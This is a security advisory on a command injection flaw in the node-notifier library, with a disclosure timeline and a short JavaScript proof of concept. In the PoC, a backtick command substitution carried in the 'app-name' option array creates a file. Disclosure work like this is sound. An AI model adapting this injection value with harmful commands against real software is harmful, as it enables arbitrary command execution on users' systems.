Coordinated Disclosure Timeline
- 12/22/2020: Report sent to the maintainer
- 02/11/2021: Report not acknowledged, contacted the maintainer again
- 03/02/2021: Report acknowledged
- 03/11/2021: Issue fixed
Summary
node-notifier recently addressed a command injection vulnerability in https://github.com/advisories/GHSA-5fw9-fq32-wv5p; however, this fix appears to be insufficient, and command injection through malicious input is still possible.
Product
node-notifier
Tested Version
8.0.1
Details
node-notifier is a general purpose library for showing OS notifications (toasts). A client of the library expects that they can safely call the methods in node-notifier with user-controlled inputs. However, in some cases, that can lead to arbitrary command execution.
Issue 1: Insufficient input sanitization leads to command injection
Certain input fields of node-notifier are insufficiently sanitized and allow for command injection when passed as command line arguments.
The provided PoC pretends to be a client that sends malicious inputs to node-notifier.
The outcome of the PoC is that a file named exploit is created in the current working directory.
- Install node-notifier: npm install node-notifier.
- Run the below with node (tested on Ubuntu).
```JavaScript
var Notify = require('node-notifier/notifiers/notifysend');
var notifier = new Notify({ suppressOsdCheck: true });
var options = {
  title: "titl",
  message: "msg",
  // the array value carries a shell command substitution; when it reaches a
  // shell unescaped, `touch exploit` runs and creates the file
  "app-name": ["foo`touch exploit`"]
  // "category": ["foo`touch exploit`"]
};
notifier.notify(options, () => {});
```
Impact
Arbitrary command execution
Resources
- This issue was detected using the following CodeQL query
- Fix commit
Credit
This issue was discovered and reported by GitHub team member @erik-krogh.
Contact
You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-373 in any communication regarding this issue.